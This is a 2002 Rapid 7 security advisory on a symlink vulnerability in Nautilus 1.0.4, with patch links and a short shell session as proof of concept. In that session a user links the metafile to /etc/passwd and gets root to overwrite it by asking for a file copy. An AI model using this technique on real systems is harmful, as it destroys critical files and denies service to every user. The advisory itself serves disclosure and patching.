[ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the
signature. See attached file for signed version.]
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability
Published: 05/02/2002
Revision: 1.0
CVE ID: CAN-2002-0157
Bugtraq ID: 4373
Affected system(s):
KNOWN VULNERABLE:
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
Summary
Nautilus is a graphical shell for GNOME. It contains a
vulnerability
which would allow a malicious user to mount a symlink attack to
overwrite
another user's files.
Vendor status and information
Nautilus
Eazel, Inc.
http://nautilus.eazel.com/
The Nautilus team was notified on 03/26/2002.
Solution
Upgrade to the latest version of Nautilus, available at
http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate
patch:
RedHat 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
Detailed analysis
When copying files from one directory to another, Nautilus creates
small (88+ bytes) XML file called '.nautilus-metafile.xml' in the
target
directory. It does not check if a symlink with the same name
already
exists there, and blindly writes XML data to it. The following
example
shows how to cause a system-wide denial of service attack with this
vulnerability:
[jdog@imisshogs jdog]$ pwd
/home/jdog
[jdog@imisshogs jdog]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[…snip…]
jdog:x:500:500::/home/jdog:/bin/bash
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Subject: Yo.
Could you please copy "creepy-in-new-york.doc" to my home
directory
(/home/jdog)? Thanks.
- Joe
Cc:
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r–r-- 1 root root 13 Mar 24 18:09
creepy-in-new-york.doc
[jdog@imisshogs jdog]$ cat /etc/passwd
<?xml version="1.0"?>
<directory>
<file name="creepy-in-new-york.doc" icon_position="55,105"/>
</directory>
[jdog@imisshogs jdog]$
Contact Information
Rapid 7 Security Advisories
Email: [email protected]
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.